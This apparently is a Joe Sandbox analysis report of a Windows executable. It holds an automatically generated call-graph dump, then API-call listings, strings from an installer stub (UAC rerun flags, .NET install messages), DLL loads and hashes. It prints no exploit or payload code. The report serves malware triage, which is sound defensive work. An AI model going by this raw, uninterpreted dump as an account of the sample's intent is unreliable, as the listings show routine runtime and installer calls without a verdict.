12847->12848 12849 222157 4 API calls 12848->12849 12856 222724 Mailbox _wcsstr 12848->12856 12851 222703 12849->12851 12850->12543 12851->12850 12852 22222b 12 API calls 12851->12852 12852->12856 12853 2227f0 lstrlenW 12853->12850 12853->12856 12855 22222b 12 API calls 12855->12856 12856->12850 12856->12853 12856->12855 12860 2225f0 12856->12860 12858 2223c3 GetLastError 12857->12858 12859 2223ce 12857->12859 12858->12859 12859->12545 12859->12549 12861 2225fb 12860->12861 12864 222610 12860->12864 12861->12864 12865 22e082 pre_c_initialization 11 API calls 12861->12865 12862 2221f0 12 API calls 12863 22263d 12862->12863 12863->12856 12864->12862 12865->12864 12867 221a53 LoadLibraryW 12866->12867 12868 221a4d 12866->12868 12869 221a69 GetProcAddress 12867->12869 12870 221a8c 12867->12870 12868->12867 12871 221a85 FreeLibrary 12869->12871 12872 221a79 12869->12872 12870->12554 12871->12870 12872->12871 12873->12565 12877 22e17c 12874->12877 12875 22e082 pre_c_initialization 11 API calls 12876 22e19e 12875->12876 12876->12572 12877->12875 12877->12876 12879 22e1e2 12878->12879 12880 22e082 pre_c_initialization 11 API calls 12879->12880 12881 22153a 12879->12881 12880->12881 12881->12565 12881->12582 12883 221b17 __EH_prolog3_catch 12882->12883 12887 221b20 12883->12887 12900 22a5f8 12883->12900 12886 221bdc 2 API calls 12886->12887 12887->12587 12889 221787 12888->12889 12891 2217a6 ___scrt_fastfail 12888->12891 12903 221c52 12889->12903 12893 221a3f 3 API calls 12891->12893 12892 22a3ad CatchGuardHandler 5 API calls 12894 221845 12892->12894 12895 221816 12893->12895 12894->12565 12896 22179a 12895->12896 12907 221847 12895->12907 12896->12892 12901 22a648 4 API calls 12900->12901 12902 221b48 12901->12902 12902->12886 12902->12887 12904 221c67 ___scrt_initialize_default_local_stdio_options 12903->12904 12924 230a25 12904->12924 12908 221dff 10 API calls 12907->12908 12909 221889 12908->12909 12910 2218b8 12909->12910 12911 22188d GetModuleFileNameW 12909->12911 12912 221e76 RegCloseKey 12910->12912 12911->12910 12913 2218c9 12912->12913 12914 22a3ad CatchGuardHandler 5 API calls 12913->12914 12915 221824 12914->12915 12915->12896 12916 2218d8 12915->12916 12917 2218fd 12916->12917 12918 221901 GetCurrentProcess OpenProcessToken 12917->12918 12922 221956 12917->12922 12919 22191d 12918->12919 12918->12922 12919->12922 12923 22194d CloseHandle 12919->12923 12920 22a3ad CatchGuardHandler 5 API calls 12921 221963 12920->12921 12921->12896 12922->12920 12923->12922 12925 230a6a 12924->12925 12926 230a55 12924->12926 12925->12926 12927 230a6e 12925->12927 12929 22e082 pre_c_initialization 11 API calls 12926->12929 12931 22e248 12927->12931 12930 221c71 12929->12930 12930->12896 12932 22e254 ___DestructExceptionObject 12931->12932 12939 230c16 EnterCriticalSection 12932->12939 12934 22e262 12940 22ec58 12934->12940 12938 22e280 _unexpected 12938->12930 12939->12934 12956 2344c0 12940->12956 12944 22ec92 12973 22ef8a 12944->12973 12951 22a3ad CatchGuardHandler 5 API calls 12952 22e26f 12951->12952 12953 22e28d 12952->12953 13109 230c2a LeaveCriticalSection 12953->13109 12955 22e297 12955->12938 12988 23445b 12956->12988 12958 2344d1 12993 2399a7 12958->12993 12960 2344d7 12961 22ec7b 12960->12961 12998 233674 12960->12998 12965 22eb97 12961->12965 12963 234532 13003 23363a 12963->13003 12966 22ebb7 12965->12966 12967 22ebae 12965->12967 12966->12967 13008 2331d2 GetLastError 12966->13008 12967->12944 12969 22ebd7 13030 233a0d 12969->13030 13067 230626 12973->13067 12975 22ecd6 12981 22ec1a 12975->12981 12976 22efaa 12977 22e082 pre_c_initialization 11 API calls 12976->12977 12977->12975 12978 22ef9b 12978->12975 12978->12976 13074 22f36c 12978->13074 13080 230662 12978->13080 12982 23363a _free 2 API calls 12981->12982 12983 22ec2a 12982->12983 12984 234573 12983->12984 12985 23457e 12984->12985 12986 22ed05 12984->12986 12985->12986 13094 234ed4 12985->13094 12986->12951 12989 234467 12988->12989 12990 23447c 12988->12990 12991 22e082 pre_c_initialization 11 API calls 12989->12991 12990->12958 12992 234477 12991->12992 12992->12958 12994 2399c1 12993->12994 12995 2399b4 12993->12995 12996 2399cd 12994->12996 12997 22e082 pre_c_initialization 11 API calls 12994->12997 12995->12960 12996->12960 12997->12995 12999 2336b0 12998->12999 13002 233682 _unexpected 12998->13002 12999->12963 13000 23369d HeapAlloc 13000->12999 13000->13002 13001 231200 _unexpected 2 API calls 13001->13002 13002->12999 13002->13000 13002->13001 13004 23366e __dosmaperr 13003->13004 13005 233645 HeapFree 13003->13005 13004->12961 13005->13004 13006 23365a 13005->13006 13007 233660 GetLastError 13006->13007 13007->13004 13010 2331e9 13008->13010 13028 2331f5 SetLastError 13010->13028 13038 234aec 13010->13038 13013 23321d 13015 233225 13013->13015 13016 23323c 13013->13016 13017 234aec _unexpected TlsSetValue 13015->13017 13019 234aec _unexpected TlsSetValue 13016->13019 13020 233233 13017->13020 13018 233283 13018->12969 13021 233248 13019->13021 13026 23363a _free 2 API calls 13020->13026 13022 23325d 13021->13022 13023 23324c 13021->13023 13047 232ffc 13022->13047 13024 234aec _unexpected TlsSetValue 13023->13024 13024->13020 13026->13028 13028->13018 13029 23363a _free 2 API calls 13029->13028 13031 233a20 13030->13031 13033 22ebed 13030->13033 13031->13033 13052 23729d 13031->13052 13034 233a3a 13033->13034 13035 233a4d 13034->13035 13037 233a62 13034->13037 13035->13037 13062 235d9c 13035->13062 13037->12967 13039 234b08 13038->13039 13040 23320d 13039->13040 13041 234b26 TlsSetValue 13039->13041 13040->13028 13042 23479b 13040->13042 13045 2347a8 _unexpected 13042->13045 13043 2347d3 RtlAllocateHeap 13044 2347e6 13043->13044 13043->13045 13044->13013 13045->13043 13045->13044 13046 231200 _unexpected EnterCriticalSection LeaveCriticalSection 13045->13046 13046->13045 13048 232eb8 _unexpected EnterCriticalSection LeaveCriticalSection 13047->13048 13049 23306a 13048->13049 13050 232fac _unexpected HeapFree GetLastError EnterCriticalSection LeaveCriticalSection 13049->13050 13051 233093 13050->13051 13051->13029 13053 2372a9 ___DestructExceptionObject 13052->13053 13054 2331d2 _unexpected 8 API calls 13053->13054 13055 2372b2 13054->13055 13056 2351f0 _unexpected EnterCriticalSection 13055->13056 13061 2372f4 _unexpected 13055->13061 13057 2372d0 13056->13057 13058 237314 __cftof HeapFree GetLastError 13057->13058 13059 2372e1 13058->13059 13060 2372fd __cftof LeaveCriticalSection 13059->13060 13060->13061 13061->13033 13063 2331d2 _unexpected 8 API calls 13062->13063 13064 235da6 13063->13064 13065 235cbe __cftof HeapFree GetLastError EnterCriticalSection LeaveCriticalSection 13064->13065 13066 235dac 13065->13066 13066->13037 13068 23063f 13067->13068 13069 23062c 13067->13069 13085 230684 13068->13085 13072 22e082 pre_c_initialization 11 API calls 13069->13072 13073 23063c 13072->13073 13073->12978 13091 22f3aa 13074->13091 13076 22f371 13077 22f388 13076->13077 13078 22e082 pre_c_initialization 11 API calls 13076->13078 13077->12978 13079 22f385 13078->13079 13079->12978 13081 230681 13080->13081 13082 230668 13080->13082 13081->12978 13082->13081 13083 22e082 pre_c_initialization 11 API calls 13082->13083 13084 23067e 13083->13084 13084->12978 13086 230698 13085->13086 13090 230645 13085->13090 13087 23445b ___scrt_uninitialize_crt 11 API calls 13086->13087 13088 23069f 13087->13088 13089 22e082 pre_c_initialization 11 API calls 13088->13089 13088->13090 13089->13090 13090->12978 13092 22f401 11 API calls 13091->13092 13093 22f3ba 13092->13093 13093->13076 13095 234eec 13094->13095 13099 234f11 13094->13099 13096 23445b ___scrt_uninitialize_crt 11 API calls 13095->13096 13095->13099 13097 234f0a 13096->13097 13100 23a46a 13097->13100 13099->12986 13101 23a476 ___DestructExceptionObject 13100->13101 13102 23a4c8 13101->13102 13104 23a531 __dosmaperr 13101->13104 13106 23a47e __dosmaperr _unexpected 13101->13106 13103 236a75 ___scrt_uninitialize_crt EnterCriticalSection 13102->13103 13107 23a4ce __dosmaperr 13103->13107 13105 22e082 pre_c_initialization 11 API calls 13104->13105 13105->13106 13106->13099 13108 23a529 ___scrt_uninitialize_crt LeaveCriticalSection 13107->13108 13108->13106 13109->12955 13110->12594 13112 23153e 13111->13112 13113 23152c 13111->13113 13129 2313d9 13112->13129 13114 22af78 GetModuleHandleW 13113->13114 13116 231531 13114->13116 13116->13112 13123 2315c6 GetModuleHandleExW 13116->13123 13117 231571 13118 231577 13117->13118 13137 231584 13117->13137 13118->12383 13124 2315e5 GetProcAddress 13123->13124 13125 231608 13123->13125 13128 2315fa 13124->13128 13126 23153d 13125->13126 13127 23160e FreeLibrary 13125->13127 13126->13112 13127->13126 13128->13125 13130 2313e5 ___DestructExceptionObject 13129->13130 13145 2351f0 EnterCriticalSection 13130->13145 13132 2313ef 13146 23143b 13132->13146 13134 2313fc 13150 231410 13134->13150 13136 231408 _unexpected 13136->13117 13174 2352eb GetPEB 13137->13174 13139 23158e 13140 2315b3 13139->13140 13141 231593 GetPEB 13139->13141 13143 2315c6 3 API calls 13140->13143 13141->13140 13142 2315a3 GetCurrentProcess TerminateProcess 13141->13142 13142->13140 13144 2315bb ExitProcess 13143->13144 13145->13132 13147 231447 ___DestructExceptionObject 13146->13147 13148 2314a8 _unexpected 13147->13148 13153 231f50 13147->13153 13148->13134 13173 235238 LeaveCriticalSection 13150->13173 13152 23141a 13152->13136 13156 231c91 13153->13156 13155 231f7b 13155->13148 13157 231c9d ___DestructExceptionObject 13156->13157 13164 2351f0 EnterCriticalSection 13157->13164 13159 231cab 13165 231e5e 13159->13165 13163 231cc9 _unexpected 13163->13155 13164->13159 13166 231e7d 13165->13166 13167 231cb8 13165->13167 13166->13167 13168 23363a _free 2 API calls 13166->13168 13169 231cd6 13167->13169 13168->13167 13172 235238 LeaveCriticalSection 13169->13172 13171 231ce0 13171->13163 13172->13171 13173->13152 13175 235305 13174->13175 13175->13139 13177 2320f7 13176->13177 13179 232109 ___scrt_uninitialize_crt 13176->13179 13178 232105 13177->13178 13189 234f81 13177->13189 13178->12445 13179->12445 13182 22c19c 13181->13182 13188 22c1ad 13181->13188 13258 22c571 13182->13258 13188->12443 13192 234e2d 13189->13192 13195 234d8b 13192->13195 13194 234e6c 13194->13178 13196 234d97 ___DestructExceptionObject 13195->13196 13203 2351f0 EnterCriticalSection 13196->13203 13198 234da1 ___scrt_uninitialize_crt 13199 234e0d 13198->13199 13204 234d09 13198->13204 13212 234e21 13199->13212 13201 234e19 _unexpected 13201->13194 13203->13198 13205 234d15 ___DestructExceptionObject 13204->13205 13215 230c16 EnterCriticalSection 13205->13215 13207 234d1f ___scrt_uninitialize_crt 13211 234d58 13207->13211 13216 234f39 13207->13216 13210 234d77 _unexpected 13210->13198 13226 234d7f 13211->13226 13257 235238 LeaveCriticalSection 13212->13257 13214 234e2b 13214->13201 13215->13207 13217 234f46 13216->13217 13218 234f4f 13216->13218 13219 234e2d ___scrt_uninitialize_crt 19 API calls 13217->13219 13220 234ed4 ___scrt_uninitialize_crt 13 API calls 13218->13220 13221 234f4c 13219->13221 13222 234f55 13220->13222 13221->13211 13222->13221 13223 23445b ___scrt_uninitialize_crt 11 API calls 13222->13223 13224 234f6b 13223->13224 13229 239c66 13224->13229 13256 230c2a LeaveCriticalSection 13226->13256 13228 234d89 13228->13210 13230 239c77 13229->13230 13231 239c84 13229->13231 13230->13221 13232 239ccd 13231->13232 13233 239cab 13231->13233 13235 22e082 pre_c_initialization 11 API calls 13232->13235 13236 239bce 13233->13236 13235->13230 13237 239bda ___DestructExceptionObject 13236->13237 13247 236a75 EnterCriticalSection 13237->13247 13239 239be9 13243 239c30 13239->13243 13248 236b4c 13239->13248 13241 239c15 FlushFileBuffers 13242 239c21 __dosmaperr 13241->13242 13241->13243 13245 239c26 GetLastError 13242->13245 13253 239c5a 13243->13253 13245->13243 13246 239c4d _unexpected 13246->13230 13247->13239 13249 236b6e __dosmaperr 13248->13249 13250 236b59 __dosmaperr 13248->13250 13251 236b93 13249->13251 13252 22e082 pre_c_initialization 11 API calls 13249->13252 13250->13241 13251->13241 13252->13250 13254 236a98 ___scrt_uninitialize_crt LeaveCriticalSection 13253->13254 13255 239c64 13254->13255 13255->13246 13256->13228 13257->13214 13259 22c57b 13258->13259 13260 22c1a1 13258->13260 13270 22d502 13259->13270 13262 22d365 13260->13262 13263 22c1a6 13262->13263 13264 22d370 13262->13264 13266 22d626 13263->13266 13265 22d37a DeleteCriticalSection 13264->13265 13265->13263 13265->13265 13267 22d655 13266->13267 13268 22d62f 13266->13268 13267->13188 13268->13267 13269 22d63f FreeLibrary 13268->13269 13269->13268 13275 22d458 13270->13275 13272 22d51c 13273 22d534 TlsFree 13272->13273 13274 22d528 13272->13274 13273->13274 13274->13260 13276 22d480 13275->13276 13280 22d47c __crt_fast_encode_pointer 13275->13280 13276->13280 13281 22d394 13276->13281 13279 22d49a GetProcAddress 13279->13280 13280->13272 13286 22d3a3 13281->13286 13282 22d44d 13282->13279 13282->13280 13283 22d3c0 LoadLibraryExW 13284 22d3db GetLastError 13283->13284 13283->13286 13284->13286 13285 22d436 FreeLibrary 13285->13286 13286->13282 13286->13283 13286->13285 13287 22d40e LoadLibraryExW 13286->13287 13287->13286 13910 233097 13911 2330a2 13910->13911 13915 2330b2 13910->13915 13916 2330b8 13911->13916 13914 23363a _free 2 API calls 13914->13915 13917 2330d3 13916->13917 13918 2330cd 13916->13918 13920 23363a _free 2 API calls 13917->13920 13919 23363a _free 2 API calls 13918->13919 13919->13917 13921 2330df 13920->13921 13922 23363a _free 2 API calls 13921->13922 13923 2330ea 13922->13923 13924 23363a _free 2 API calls 13923->13924 13925 2330f5 13924->13925 13926 23363a _free 2 API calls 13925->13926 13927 233100 13926->13927 13928 23363a _free 2 API calls 13927->13928 13929 23310b 13928->13929 13930 23363a _free 2 API calls 13929->13930 13931 233116 13930->13931 13932 23363a _free 2 API calls 13931->13932 13933 233121 13932->13933 13934 23363a _free 2 API calls 13933->13934 13935 23312c 13934->13935 13936 23363a _free 2 API calls 13935->13936 13937 23313a 13936->13937 13942 232f00 13937->13942 13939 233160 13950 232f61 13939->13950 13941 2330aa 13941->13914 13943 232f0c ___DestructExceptionObject 13942->13943 13958 2351f0 EnterCriticalSection 13943->13958 13945 232f40 13959 232f55 13945->13959 13946 232f16 13946->13945 13949 23363a _free 2 API calls 13946->13949 13948 232f4d _unexpected 13948->13939 13949->13945 13951 232f6d ___DestructExceptionObject 13950->13951 13963 2351f0 EnterCriticalSection 13951->13963 13953 232f77 13964 233187 13953->13964 13955 232f8a 13968 232fa0 13955->13968 13957 232f98 _unexpected 13957->13941 13958->13946 13962 235238 LeaveCriticalSection 13959->13962 13961 232f5f 13961->13948 13962->13961 13963->13953 13965 233196 _unexpected 13964->13965 13967 2331bd _unexpected 13964->13967 13965->13967 13971 23704f 13965->13971 13967->13955 14085 235238 LeaveCriticalSection 13968->14085 13970 232faa 13970->13957 13976 237065 13971->13976 13993 2370cf 13971->13993 13973 23363a _free 2 API calls 13975 2370f1 13973->13975 13974 237098 13977 2370ba 13974->13977 13984 23363a _free 2 API calls 13974->13984 13978 23363a _free 2 API calls 13975->13978 13976->13974 13979 23363a _free 2 API calls 13976->13979 13976->13993 13981 23363a _free 2 API calls 13977->13981 13980 237104 13978->13980 13983 23708d 13979->13983 13985 23363a _free 2 API calls 13980->13985 13986 2370c4 13981->13986 13982 23718b 13988 23363a _free 2 API calls 13982->13988 13999 236bb6 13983->13999 13991 2370af 13984->13991 13992 237112 13985->13992 13987 23363a _free 2 API calls 13986->13987 13987->13993 13994 237191 13988->13994 13989 23363a HeapFree GetLastError _free 13995 23712b 13989->13995 14027 236cb4 13991->14027 13997 23363a _free 2 API calls 13992->13997 13993->13973 13998 23711d 13993->13998 13994->13967 13995->13982 13995->13989 13997->13998 14039 2371c2 13998->14039 14000 236bc7 13999->14000 14026 236cb0 13999->14026 14001 236bd8 14000->14001 14002 23363a _free 2 API calls 14000->14002 14003 236bea 14001->14003 14005 23363a _free 2 API calls 14001->14005 14002->14001 14004 236bfc 14003->14004 14006 23363a _free 2 API calls 14003->14006 14007 236c0e 14004->14007 14008 23363a _free 2 API calls 14004->14008 14005->14003 14006->14004 14009 236c20 14007->14009 14010 23363a _free 2 API calls 14007->14010 14008->14007 14011 236c32 14009->14011 14013 23363a _free 2 API calls 14009->14013 14010->14009 14012 236c44 14011->14012 14014 23363a _free 2 API calls 14011->14014 14015 236c56 14012->14015 14016 23363a _free 2 API calls 14012->14016 14013->14011 14014->14012 14017 236c68 14015->14017 14018 23363a _free 2 API calls 14015->14018 14016->14015 14019 236c7a 14017->14019 14020 23363a _free 2 API calls 14017->14020 14018->14017 14021 23363a _free 2 API calls 14019->14021 14022 236c8c 14019->14022 14020->14019 14021->14022 14023 236c9e 14022->14023 14024 23363a _free 2 API calls 14022->14024 14025 23363a _free 2 API calls 14023->14025 14023->14026 14024->14023 14025->14026 14026->13974 14028 236cc1 14027->14028 14038 236d19 14027->14038 14029 236cd1 14028->14029 14030 23363a _free 2 API calls 14028->14030 14031 23363a _free 2 API calls 14029->14031 14032 236ce3 14029->14032 14030->14029 14031->14032 14033 23363a _free 2 API calls 14032->14033 14034 236cf5 14032->14034 14033->14034 14035 236d07 14034->14035 14036 23363a _free 2 API calls 14034->14036 14037 23363a _free 2 API calls 14035->14037 14035->14038 14036->14035 14037->14038 14038->13977 14040 2371ee 14039->14040 14041 2371cf 14039->14041 14040->13995 14041->14040 14045 236d55 14041->14045 14044 23363a _free 2 API calls 14044->14040 14046 236e33 14045->14046 14047 236d66 14045->14047 14046->14044 14081 236d1d 14047->14081 14050 236d1d _unexpected 2 API calls 14051 236d79 14050->14051 14052 236d1d _unexpected 2 API calls 14051->14052 14053 236d84 14052->14053 14054 236d1d _unexpected 2 API calls 14053->14054 14055 236d8f 14054->14055 14056 236d1d _unexpected 2 API calls 14055->14056 14057 236d9d 14056->14057 14058 23363a _free 2 API calls 14057->14058 14059 236da8 14058->14059 14060 23363a _free 2 API calls 14059->14060 14061 236db3 14060->14061 14062 23363a _free 2 API calls 14061->14062 14063 236dbe 14062->14063 14064 236d1d _unexpected 2 API calls 14063->14064 14065 236dcc 14064->14065 14066 236d1d _unexpected 2 API calls 14065->14066 14067 236dda 14066->14067 14068 236d1d _unexpected 2 API calls 14067->14068 14069 236deb 14068->14069 14070 236d1d _unexpected 2 API calls 14069->14070 14071 236df9 14070->14071 14072 236d1d _unexpected 2 API calls 14071->14072 14073 236e07 14072->14073 14074 23363a _free 2 API calls 14073->14074 14075 236e12 14074->14075 14076 23363a _free 2 API calls 14075->14076 14077 236e1d 14076->14077 14078 23363a _free 2 API calls 14077->14078 14079 236e28 14078->14079 14080 23363a _free 2 API calls 14079->14080 14080->14046 14082 236d50 14081->14082 14083 236d40 14081->14083 14082->14050 14083->14082 14084 23363a _free 2 API calls 14083->14084 14084->14083 14085->13970 15529 2366f8 15532 236634 15529->15532 15531 23671d 15533 236640 ___DestructExceptionObject 15532->15533 15536 2351f0 EnterCriticalSection 15533->15536 15535 23664e _unexpected 15535->15531 15536->15535 15878 230bca 15879 234f81 ___scrt_uninitialize_crt 19 API calls 15878->15879 15880 230bd2 15879->15880 15888 234c68 15880->15888 15882 230bd7 15898 234f8a 15882->15898 15885 230c01 15886 23363a _free 2 API calls 15885->15886 15887 230c0c 15886->15887 15889 234c74 ___DestructExceptionObject 15888->15889 15902 2351f0 EnterCriticalSection 15889->15902 15891 234ceb 15914 234d00 15891->15914 15893 234c7f 15893->15891 15895 234cbf DeleteCriticalSection 15893->15895 15903 239b54 15893->15903 15894 234cf7 _unexpected 15894->15882 15897 23363a _free 2 API calls 15895->15897 15897->15893 15899 234fa1 15898->15899 15900 230be6 DeleteCriticalSection 15898->15900 15899->15900 15901 23363a _free 2 API calls 15899->15901 15900->15882 15900->15885 15901->15900 15902->15893 15904 239b60 ___DestructExceptionObject 15903->15904 15905 239b6a 15904->15905 15906 239b7f 15904->15906 15909 22e082 pre_c_initialization 11 API calls 15905->15909 15913 239b7a _unexpected 15906->15913 15917 230c16 EnterCriticalSection 15906->15917 15908 239b9c 15918 239add 15908->15918 15909->15913 15911 239ba7 15932 239bc4 15911->15932 15913->15893 15973 235238 LeaveCriticalSection 15914->15973 15916 234d07 15916->15894 15917->15908 15919 239aea 15918->15919 15920 239aff 15918->15920 15922 22e082 pre_c_initialization 11 API calls 15919->15922 15921 234ed4 ___scrt_uninitialize_crt 13 API calls 15920->15921 15924 239afa 15920->15924 15923 239b14 15921->15923 15922->15924 15925 234f8a 2 API calls 15923->15925 15924->15911 15926 239b1c 15925->15926 15927 23445b ___scrt_uninitialize_crt 11 API calls 15926->15927 15928 239b22 15927->15928 15935 23b50e 15928->15935 15930 239b28 15930->15924 15931 23363a _free 2 API calls 15930->15931 15931->15924 15972 230c2a LeaveCriticalSection 15932->15972 15934 239bcc 15934->15913 15936 23b534 15935->15936 15940 23b51f __dosmaperr 15935->15940 15937 23b55b 15936->15937 15938 23b57d __dosmaperr 15936->15938 15942 23b48c 15937->15942 15941 22e082 pre_c_initialization 11 API calls 15938->15941 15940->15930 15941->15940 15943 23b498 ___DestructExceptionObject 15942->15943 15950 236a75 EnterCriticalSection 15943->15950 15945 23b4a6 15947 23b4d3 15945->15947 15951 23b59d 15945->15951 15964 23b502 15947->15964 15949 23b4f5 _unexpected 15949->15940 15950->15945 15952 236b4c ___scrt_uninitialize_crt 11 API calls 15951->15952 15953 23b5ad 15952->15953 15954 23b5b3 15953->15954 15956 23b5e5 15953->15956 15958 236b4c ___scrt_uninitialize_crt 11 API calls 15953->15958 15967 236abb 15954->15967 15956->15954 15957 236b4c ___scrt_uninitialize_crt 11 API calls 15956->15957 15960 23b5f1 CloseHandle 15957->15960 15959 23b5dc 15958->15959 15961 236b4c ___scrt_uninitialize_crt 11 API calls 15959->15961 15960->15954 15962 23b5fd GetLastError 15960->15962 15961->15956 15962->15954 15963 23b60b __dosmaperr 15963->15947 15971 236a98 LeaveCriticalSection 15964->15971 15966 23b50c 15966->15949 15968 236b21 __dosmaperr 15967->15968 15969 236aca 15967->15969 15968->15963 15969->15968 15970 236b1b SetStdHandle 15969->15970 15970->15968 15971->15966 15972->15934 15973->15916

                                                                    Executed Functions

                                                                    Function 00227326 Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 168libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • SetDefaultDllDirectories.KERNEL32(00000800), ref: 0022734F
                                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 0022735A
                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00227366
                                                                    • CoInitialize.OLE32(00000000), ref: 002273CD
                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 002273EE
                                                                      • Part of subcall function 00222304: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 00222373
                                                                      • Part of subcall function 00222304: VerSetConditionMask.KERNEL32(00000000), ref: 00222377
                                                                      • Part of subcall function 00222304: VerSetConditionMask.KERNEL32(00000000), ref: 0022237B
                                                                      • Part of subcall function 00222304: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0022239E
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,--rerunningWithoutUAC,?,00246FB0), ref: 00227506
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00001000), ref: 00227519
                                                                    Strings
                                                                    • Failed to install the .NET Framework, try installing the latest version manually, xrefs: 002274D3
                                                                    • kernel32.dll, xrefs: 00227355
                                                                    • --checkInstall, xrefs: 0022738C
                                                                    • This program cannot run on Windows XP or before; it requires a later version of Windows., xrefs: 002274A2
                                                                    • --rerunningWithoutUAC, xrefs: 00227445
                                                                    • Incompatible Operating System, xrefs: 0022749D
                                                                    • --silent, xrefs: 002273BF
                                                                    • SetDefaultDllDirectories, xrefs: 00227360
                                                                    • Please re-run this installer as a normal user instead of "Run as Administrator"., xrefs: 00227463
                                                                    • --rerunningWithoutUAC, xrefs: 00227536
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: ConditionMask$Module$AddressCommonControlsDefaultDirectoriesFileHandleInfoInitInitializeLibraryLoadNameProcVerifyVersion
                                                                    • String ID: --rerunningWithoutUAC$ --silent$--checkInstall$--rerunningWithoutUAC$Failed to install the .NET Framework, try installing the latest version manually$Incompatible Operating System$Please re-run this installer as a normal user instead of "Run as Administrator".$SetDefaultDllDirectories$This program cannot run on Windows XP or before; it requires a later version of Windows.$kernel32.dll
                                                                    • API String ID: 365319271-1442077338
                                                                    • Opcode ID: fdebde064196c17b9c6b029ce24ef5e9ae49121d0906a8a5a622f6cdfe9ff2d1
                                                                    • Instruction ID: e69b688c4858ea81ede3f22282e105faeb8077254bfdd356e98fe255595f8fa3
                                                                    • Opcode Fuzzy Hash: fdebde064196c17b9c6b029ce24ef5e9ae49121d0906a8a5a622f6cdfe9ff2d1
                                                                    • Instruction Fuzzy Hash: 7251C531A28335B6DB24BBF4BC8AAAEB764AF51300F444094FD0963182DF745EB9CE51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00231584 Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 195 231584-231591 call 2352eb 198 2315b3-2315bf call 2315c6 ExitProcess 195->198 199 231593-2315a1 GetPEB 195->199 199->198 200 2315a3-2315ad GetCurrentProcess TerminateProcess 199->200 200->198
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,00231583,?,?,?,?), ref: 002315A6
                                                                    • TerminateProcess.KERNEL32(00000000,?,00231583,?,?,?,?), ref: 002315AD
                                                                    • ExitProcess.KERNEL32 ref: 002315BF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: e7ebcbec5784d51d3bb32a6f91f1b674b3a7bb5ef40b956e2873e9ccc563caeb
                                                                    • Instruction ID: 3604a16421521efd474521995665374cad84c71f82afbedb46107b73f3626607
                                                                    • Opcode Fuzzy Hash: e7ebcbec5784d51d3bb32a6f91f1b674b3a7bb5ef40b956e2873e9ccc563caeb
                                                                    • Instruction Fuzzy Hash: F7E0B6B1421508ABCF556F58FE4DA493BA9EB94741F404424F90A96232CB75DEA1DE80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002271EF Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69libraryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 002271F9
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0022720A
                                                                    • LoadLibraryW.KERNELBASE(?), ref: 002272CF
                                                                    • LoadLibraryW.KERNELBASE(?), ref: 002272E6
                                                                    • LoadLibraryW.KERNELBASE(?), ref: 002272FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2001570461.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                    • Associated: 00000000.00000002.2001434661.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001607637.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001628140.000000000024A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2001645499.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_220000_0219830219301290321012notas.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$DirectoryH_prolog3_System
                                                                    • String ID: \logoncli.dll$\sspicli.dll$\version.dll
                                                                    • API String ID: 204495113-3953914256
                                                                    • Opcode ID: 9723ee28a08b59f7e4bedd5523078f5c20cff655ee0fbd42c0b272cb58bf5b6b
                                                                    • Instruction ID: 9467b7db9df0d52e9b4616e0c3efc073607e368401dd813cdd01e28a51f6c9cc
